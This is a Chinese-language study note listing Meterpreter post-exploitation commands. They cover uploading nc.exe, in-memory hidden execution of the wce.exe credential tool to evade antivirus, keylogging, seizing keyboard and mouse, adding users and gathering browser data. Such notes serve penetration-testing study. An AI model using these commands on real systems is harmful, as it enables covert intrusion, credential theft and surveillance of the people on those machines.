Meterpreter深度渗透
通常情况下,meterpreter的权限就是被攻击进程的启动权限或被攻击用户的执行权限。
Meterpreter会话下:
- upload:从kali主机上传到靶机
upload /usr/share/windows-binarier/nc.exe C:\
- getuid:查看meterpreter的系统运行权限
- ps:当前正在运行的进程列表
- download:从靶机下载文件到本机上
- systeminfo:
- execute -f notepad.exe:执行程序,加-H可在后台隐秘执行
- execute -H -i -f cmd.exe:在目标主机上运行cmd程序并以隐藏的方式交互到meterpreter会话上
- execute -H -m -d notepad.exe -f wce.exe -a “-o wce.txt”:在目标主机内存中直接执行攻击机上的程序,可以避免存储到目标主机上被发现或查杀。
- -d:傀儡程序,在目标主机执行时显示的进程
- -m:从内存中执行
- “-o wce.txt" 是wce.exe的运行参数
- -a:添加命令的参数
- edit:调用编辑器,对目标主机上的文件修改,如host文件
- search -f xxx.bat
- portfwd:端口转发
- netstat -an |grep 4444
- rdesktop -u username -p password:远程桌面
- route:查看路由表
- route add:添加路由
- route print:
- run get_local_subnets:目标主句的内网IP段
- arp
- cat c:\boot.ini
- 键盘监听:
- keyscan_start:开启键盘记录
- keyscan_dump:显示键盘记录
- keyscan_stop:关闭键盘记录
- uictl enable keyboard/mouse:接管目标主机的键盘或鼠标
- getdesktop/screenshot:截图
- reboot/shutdown
- reg:与注册表互动
- shell:获得控制台权限
- add_user
- add_group_user
- 获取敏感信息:
- run post/windows/gather/checkvm:检查是否虚拟机
- run post/windows/gather/enum_applications:获取软件安装信息
- run post/windows/gather/dumplinks:最近的文件操作
- run post/windows/gather/enum_ie/chrome:获取浏览器缓存
- 除了Meterpreter命令之外,meterpreter控制台还提供了脚本功能,kali中这里脚本存储在:
/usr/share/metasploit-framework/scripts/meterpreter
,要执行脚本,使用run [script-name] 命令。- 更多命令可以参考:https://www/cnblogs/com/backlion/p/9484949.html